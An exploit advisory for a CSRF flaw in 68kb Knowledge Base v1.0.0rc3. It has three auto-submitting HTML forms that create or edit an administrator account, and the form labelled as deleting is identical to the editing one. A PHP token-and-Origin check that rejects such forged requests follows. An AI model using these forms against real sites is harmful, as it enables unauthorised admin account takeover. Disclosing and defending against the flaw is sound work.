Exploit Title: 68kb Knowledge Base v1.0.0rc3 create administrator account CSRF
Date: 2010-04-02
Author: Jelmer de Hen
Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc3.zip
Version: v1.0.0rc3

<html>
<body onload="document.forms['create'].submit()">
<form name="create" method="post" action="http://<server>/index.php/admin/users/add">
<input type=hidden name="username" value="JohnDoe">
<input type=hidden name="email" value="email">
<input type=hidden name="level" value="1">
<input type=hidden name="password" value="password">
<input type=hidden name="passconf" value="password">
</form>
</body>
</html>

Example of deleting an account:

<html>
<body onload="document.forms['edit'].submit()">
<form name="edit" method="post" action="http://<server>/index.php/admin/users/edit/1">
<input type=hidden name="username" value="JohnDoe">
<input type=hidden name="email" value="email">
<input type=hidden name="level" value="1">
<input type=hidden name="password" value="password">
<input type=hidden name="passconf" value="password">
<input type=hidden name="id" value="1">
</form>
</body>
</html>

Example of editing:

<html>
<body onload="document.forms['edit'].submit()">
<form name="edit" method="post" action="http://<server>/index.php/admin/users/edit/1">
<input type=hidden name="username" value="JohnDoe">
<input type=hidden name="email" value="email">
<input type=hidden name="level" value="1">
<input type=hidden name="password" value="password">
<input type=hidden name="passconf" value="password">
<input type=hidden name="id" value="1">
</form>
</body>
</html>
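
A server-side check that rejects the forged POSTs above, given as an added example (not code from 68kb or from the advisory): a per-session synchronizer token compared in constant time, plus an Origin check. The function names, the `csrf_token` field, the session array and the `kb.example` origin are assumptions made for illustration.

```php
<?php
// Added example, not 68kb code. Function names, the csrf_token field and
// the trusted origin below are assumptions made for illustration.
declare(strict_types=1);

const TRUSTED_ORIGIN = 'https://kb.example'; // constructed value

// Issue one random token per session; every admin form embeds it as a hidden field.
function csrf_issue(array &$session): string
{
    if (!isset($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a state-changing request (users/add, users/edit) may proceed.
function csrf_allowed(array $session, string $method, array $headers, array $post): bool
{
    if ($method !== 'POST') {
        return false; // account changes must never be reachable via GET
    }
    // A cross-site form post carries the submitting page's Origin (or "null").
    if (isset($headers['Origin']) && $headers['Origin'] !== TRUSTED_ORIGIN) {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($supplied)) {
        return false;
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// Constructed sample requests: the advisory's form fields, with and without a token.
$session = ['user_level' => 1];
$token   = csrf_issue($session);
$fields  = ['username' => 'JohnDoe', 'email' => 'email', 'level' => '1',
            'password' => 'password', 'passconf' => 'password'];
$cases = [
    'forged, cross-site, no token' => [['Origin' => 'https://other.example'], $fields],
    'forged, no Origin, no token'  => [[], $fields],
    'forged, guessed token'        => [[], $fields + ['csrf_token' => str_repeat('0', 64)]],
    'genuine admin form'           => [['Origin' => TRUSTED_ORIGIN], $fields + ['csrf_token' => $token]],
];
foreach ($cases as $label => [$headers, $post]) {
    $ok = csrf_allowed($session, 'POST', $headers, $post);
    printf("%-30s %s\n", $label, $ok ? 'accepted' : 'rejected');
}
```

In an application the check runs before the handlers for `admin/users/add` and `admin/users/edit`, and the token from `csrf_issue()` is written into each admin form as a hidden `csrf_token` field.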